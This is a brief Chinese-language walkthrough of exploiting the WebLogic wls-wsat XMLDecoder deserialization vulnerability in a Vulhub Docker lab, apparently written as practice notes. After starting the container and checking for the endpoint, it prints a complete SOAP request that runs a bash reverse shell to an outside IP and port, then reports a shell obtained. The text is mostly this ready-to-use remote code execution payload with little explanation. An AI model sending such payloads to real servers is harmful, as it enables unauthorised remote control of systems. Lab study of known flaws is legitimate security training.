1.环境搭建
cd vulhub-master/weblogic/weak_password
docker-compose up -d
2.判断wls-wsat组件是否存在
拼接/wls-wsat/CoordinatorPortType
查看页面是否有回显 有回显说明存在组件
3.在当前页面抓包 反弹shell
添加请求包内容
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<object class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>bash -i >& /dev/tcp/47.121.211.205/6666 0>&1</string>
</void>
</array>
<void method="start"/></object>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
成功反弹shell
